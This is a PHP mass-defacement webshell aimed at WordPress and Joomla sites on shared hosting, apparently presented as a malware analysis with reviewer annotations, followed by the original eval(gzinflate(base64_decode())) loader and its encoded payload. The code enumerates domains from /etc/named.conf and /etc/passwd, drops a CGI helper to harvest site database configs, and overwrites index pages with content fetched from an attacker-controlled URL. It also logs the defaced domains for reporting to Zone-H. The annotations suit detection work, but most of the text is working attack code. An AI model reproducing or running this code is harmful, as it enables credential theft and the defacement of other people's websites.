    // Running list of affected domains, appended across runs.
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>
    ';
    $j = 1;
    // account name => domain, built from the owner of each valiases file.
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'tolizuga';
    // Helper drop: directory, executable file, and CGI-enabling .htaccess.
    mkdir('plsym',0777);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cc

AddHandler cgi-script .cc
AddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    // The helper is executed by requesting it through the web server.
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    // The helper is removed immediately after its single run.
    unlink('plsym/plsym.cc');
    // The auto-generated directory index is scraped for links.
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    // First link is dropped (presumably the parent-directory entry).
    unset($match[1][0]);
    $i = 1;
    foreach($match[1] as $m)    
    {
        // File names are "<account>##<type>.txt".
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        // Joomla is recognised by "dbprefix" appearing in the harvested text.
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</td></a>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
        }

        // WordPress is recognised by "DB_NAME" appearing in the harvested text.
        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">Basarsz A.Q</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>
    ';
    echo '<hr/>';
    // Summary line and link to the accumulated defaced.html list.
    echo 'Toplam Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">Deface Edilen Siteler A.Q. ( Tikla )</a><br />';
    if($count1+$count2 > 0){
        // Link back to this script with zh=1; the handler for that parameter is
        // not in the visible part of the file.
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}

/**
 * Mode 3 driver: same flow as exec_mode_2(), but first writes operator-pasted
 * data to disk (analyst annotation; code left unchanged).
 *
 * The only difference visible in the code is that the raw POST field
 * "man_data" is written to plsym/data.txt before the helper file is dropped.
 * The form on this page labels that field as a manual copy of /etc/passwd, so
 * data.txt is presumably the helper's input when the real file is unreadable.
 *
 * NOTE(review): in this decoded copy $dt holds only a short literal, so the
 * helper's actual content is not present on the page.
 *
 * Filesystem artefacts for triage: plsym/, plsym/data.txt, plsym/.htaccess,
 * files matching "*##joomla.txt" or "*##wordpress.txt", defaced.html.
 *
 * @param string $def_url  URL whose body is fetched and used as replacement page content.
 * @return void  Output is echoed directly.
 */
function exec_mode_3($def_url) {
    
    // Domain enumeration from the DNS server configuration.
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    // "Toplam Domain" = total domains.
    print("Toplam Domain: $num<br><br />");
    
    // Replacement page content is pulled from an operator-supplied URL.
    $def = file_get_contents($def_url);
    $def = urlencode($def);
       
    // Running list of affected domains, appended across runs.
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>
    ';
    $j = 1;
    // account name => domain, built from the owner of each valiases file.
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    $dt = 'tolizuga';
    mkdir('plsym',0777);
    // Operator-supplied text is written verbatim to disk.
    file_put_contents('plsym/data.txt', $_POST['man_data']);
    // Helper drop: executable file and CGI-enabling .htaccess.
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cc

AddHandler cgi-script .cc
AddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    // The helper is executed by requesting it through the web server.
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    // The helper is removed immediately after its single run.
    unlink('plsym/plsym.cc');
    // The auto-generated directory index is scraped for links.
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    // First link is dropped (presumably the parent-directory entry).
    unset($match[1][0]);
    $i=1;
    foreach($match[1] as $m)    
    {
        // File names are "<account>##<type>.txt".
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        // Joomla is recognised by "dbprefix" appearing in the harvested text.
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</td></a>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
        }

        // WordPress is recognised by "DB_NAME" appearing in the harvested text.
        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>
    ';
    echo '<hr/>';
    // Summary line and link to the accumulated defaced.html list.
    echo 'Toplam Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">Deface Edilen Siteler A.Q. ( Tikla )</a><br />';
    if($count1+$count2 > 0){
        // Link back to this script with zh=1; the handler for that parameter is
        // not in the visible part of the file.
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
// Analyst note: operator UI. The page shell below is emitted on every request.
// Strings useful for content signatures: the <title> text, the remote image
// URLs on i.hizliresim.com, and the heading "Wordpress ve Joomla Mass Defacer".
// The "***" runs inside type attributes are masking applied by the hosting
// page, not part of the original sample.
echo '<!DOCTYPE html>
<html>
<head>
<title>By ToLiZuGa( Mass Defacer )</title>
<link href="http://fonts.googleapis.com/***?family=Orbitron:700" rel="stylesheet" type="text/***">
<style type="text/***">
table,body {
    background-color: #ffffff;
    color:white;
    font-family: "Trebuchet MS",Arial;
    background-attachment:fixed;
    margin:0;
    padding:0;
    background-image: url(http://i.hizliresim.com/6RpYB3.png);
    background-repeat: repeat;
    background-position: center top;
}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
.style1 {color: #FF0000}
.style2 {color: #FFFFFF}
.style4 {
    color: #00ff00;
    text-align: center;
    text-shadow: 6px 6px 6px black;
    font-weight: bold;
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-style: italic;
}
</style>
<script type="text/************">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
        }
        function hide() {
document.getElementById(\'tra\').style.display = \'none\';
        }
    </script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">&nbsp;&nbsp;<a href="http://i.hizliresim.com/ek735m.png" target="_blank"><img src="http://i.hizliresim.com/ek735m.png" width=451 height="140" border="0"></a></h3>
</div>
<h2 class="style4"><span class="style1">Wordpress</span> <span class="style2">ve Joomla</span> <span class="style1">Mass</span> <span class="style2">Defacer</span></h2>
';
// The launch form is shown only when none of the action parameters
// (POST form_action, GET zh / mode / kill) is present. It reports whether
// /etc/named.conf and /etc/passwd are readable by the PHP process, offers a
// textarea ("man_data") for a pasted copy of /etc/passwd, and pre-fills the
// "defpage" field with the URL of the replacement page.
// ("Okunabilir" = readable; "Baslat" = start.)
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onClick="hide();"></td><td>using /etc/named.conf ('.(is_READABLE('/etc/named.conf')?'<span class="green">Okunabilir</span>':'<span class="red">OkunaBilir Degil</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onClick="hide();"></td><td>using /etc/passwd ('.(is_READABLE('/etc/passwd')?'<span class="green">Okunabilir</span>':'<span class="red">OkunaBilir Degil</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onClick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>Index URL : </b><input size="35" type="text" name="defpage" value="http://tolizuga.esy.es/tolizuga.html"></tr></td>
</table>
<input class=submit type="submit" value="Baslat Reis !!!" name="Submit">
</form>';
    }
$milaf_el_index = $_POST['defpage'];
    if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
    }
    if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
echo '</body>
</html>';


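Original Code

The submitted file is a single preg_replace() call with the /e (evaluate) modifier. Its hex-escaped replacement string spells eval(gzinflate(base64_decode('…')));, so the blob below is base64-encoded, deflate-compressed PHP, and the call counts under "Function Calls" suggest several such layers are nested. The /e modifier was removed in PHP 7.0, so this loader executes only on older PHP versions.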

<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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
